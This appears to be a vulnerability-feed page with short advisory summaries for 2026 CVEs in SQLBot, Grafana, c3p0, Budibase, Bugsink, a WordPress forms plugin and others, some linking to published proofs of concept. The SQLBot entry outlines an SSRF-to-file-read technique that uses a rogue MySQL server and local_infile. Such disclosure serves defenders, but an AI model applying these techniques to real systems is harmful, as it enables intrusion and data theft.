CVE-2026-32949

SQLBot is vulnerable prior to version 1.7.0 to an SSRF leading to arbitrary local-file reads. An attacker can abuse /api/v1/datasource/check by supplying a forged MySQL data source with extraJdbc="local_infile=1". During connectivity verification, a rogue MySQL server issues a malicious LOAD DATA...

PT-2026-26556

SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a Server-Side Request Forgery SSRF vulnerability that allows an attacker to retrieve arbitrary system and application files from the server. An attacker can exploit the...

Budibase 代码问题漏洞

Budibase is an open-source platform developed by Budibase in the UK. It allows for the creation of internal applications, workflows, and management panels within minutes. Budibase versions 3.30.6 and earlier have code vulnerabilities. These vulnerabilities stem from the fact that the REST data...

PT-2026-26260

A Stored cross-site scripting XSS vulnerability affects HCL Unica Marketing Operations v12.1.8 and lower. Stored cross-site scripting also known as second-order or persistent XSS arises when an application receives data from an untrusted source and includes that data within its later HTTP...

CVE-2026-28791

creationtimestamp| type| source ---|---|--- 2026-03-12 05:09:56+00:00| published-proof-of-concept| https://github.com/tinacms/tinacms/security/advisories/GHSA-5hxf-c7j4-279c 2026-03-12 19:40:05+00:00| seen| https://gist.github.com/alon710/d73d499cf1d6e8d3c3762966f6b93ea2...

SUSE CVE-2026-27830

c3p0, a JDBC Connection pooling library, is vulnerable to attack via maliciously crafted Java-serialized objects and javax.naming.Reference instances. Several c3p0 ConnectionPoolDataSource implementations have a property called userOverridesAsString which conceptually represents a Map. Prior to...

CVE-2026-27830 c3p0 vulnerable to Remote Code Execution via unsafe deserialization of userOverridesAsString property

c3p0, a JDBC Connection pooling library, is vulnerable to attack via maliciously crafted Java-serialized objects and javax.naming.Reference instances. Several c3p0 ConnectionPoolDataSource implementations have a property called userOverridesAsString which conceptually represents a Map. Prior to...

CVE-2026-21725

A flaw was found in Grafana. This vulnerability, known as a time-of-create-to-time-of-use TOCTOU issue, allows an attacker to delete a data source without proper authorization. For this to occur, the attacker must have previously managed the data source, and it must be recreated with the same...

CVE-2026-21725

A time-of-create-to-time-of-use TOCTOU vulnerability lets recently deleted-then-recreated data sources be re-deleted without permission to do so. This requires several very stringent conditions to be met: - The attacker must have admin access to the specific datasource prior to its first deletion...

CVE-2026-21725

CVE-2026-21725 describes a TOCTOU issue in Grafana data sources where a recently deleted-then-recreated datasource can be re-deleted by an attacker. Conditions include admin access before first deletion, a 30-second window on the same pod, the attacker deleting the datasource, a recreate by anoth...

CVE-2026-27614

Bugsink is a self-hosted error tracking tool. In versions prior to 2.0.13, an unauthenticated attacker who can submit events to a Bugsink project can store arbitrary JavaScript in an event. The payload executes only if a user explicitly views the affected Stacktrace in the web UI. When Pygments...

PT-2026-22063

Name of the Vulnerable Software and Affected Versions c3p0 versions prior to 0.12.0 Description c3p0, a JDBC Connection pooling library, is susceptible to attack through maliciously crafted Java-serialized objects and javax.naming.Reference instances. Specifically, the userOverridesAsString...

CVE-2025-70956

creationtimestamp| type| source ---|---|--- 2026-02-13 12:38:14+00:00| seen| https://gist.github.com/Lucian-code233/beab9d14683ed2bdf5543be430b91c70 2026-02-17 16:36:50+00:00| seen| https://bsky.app/profile/thehackerwire.bsky.social/post/3mf2yqt4qlu2v 2026-02-17 16:36:51+00:00| seen|...

Grafana has a Cross-site Scripting issue

Stack traces in Grafana's Explore Traces view can be rendered as raw HTML, and thus inject malicious JavaScript in the browser. This would require malicious JavaScript to be entered into the stack trace field. Only datasources with the Jaeger HTTP API appear to be affected; Jaeger gRPC and Tempo ...

GHSA-CQP7-WF4C-3XGC Grafana has a Cross-site Scripting issue

Stack traces in Grafana's Explore Traces view can be rendered as raw HTML, and thus inject malicious JavaScript in the browser. This would require malicious JavaScript to be entered into the stack trace field. Only datasources with the Jaeger HTTP API appear to be affected; Jaeger gRPC and Tempo ...

UBUNTU-CVE-2025-41117

Stack traces in Grafana's Explore Traces view can be rendered as raw HTML, and thus inject malicious JavaScript in the browser. This would require malicious JavaScript to be entered into the stack trace field. Only datasources with the Jaeger HTTP API appear to be affected; Jaeger gRPC and Tempo ...

CVE-2026-0632

The Fluent Forms Pro Add On Pack plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.1.12 via the 'saveDataSource' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to...

WordPress Fluent Forms Pro Add On Pack plugin <= 6.1.12 - Authenticated (Subscriber+) Server-Side Request Forgery via 'saveDataSource' vulnerability

Authenticated Subscriber+ Server-Side Request Forgery via 'saveDataSource' vulnerability discovered by andrea bocchetti in WordPress Plugin Fluent Forms Pro Add On Pack versions = 6.1.12...

1inch-agent-kit (=1.0.53), @0xchain/auth (>=0.0.1 <=1.1.0-beta.18) +4367 more potentially affected by CVE-2026-25639 via axios (>=1.0.0 <=1.13.4)

axios NPM version =1.0.0, =0.0.1, =0.0.1, =0.0.1, =0.0.1, =8.0.5, =6.1.0, =0.0.1-alpha.3, =1.0.3-rc.0, =2.0.1 - @1tokenfe/hd-ble-sdk =1.1.15 - @1tokenfe/hd-common-connect-sdk =1.1.15 - @1tokenfe/hd-core =1.1.15 - @1tokenfe/hd-transport-electron =1.1.15 - @1tokenfe/hd-transport-emulator =1.1.15 -...

CVE-2026-0632

CVE-2026-0632 affects the Fluent Forms Pro Add On Pack for WordPress. All versions up to and including 6.1.12 are vulnerable to Server-Side Request Forgery via the saveDataSource function. Authenticated users with Subscriber-level access or higher can cause the web application to make requests to...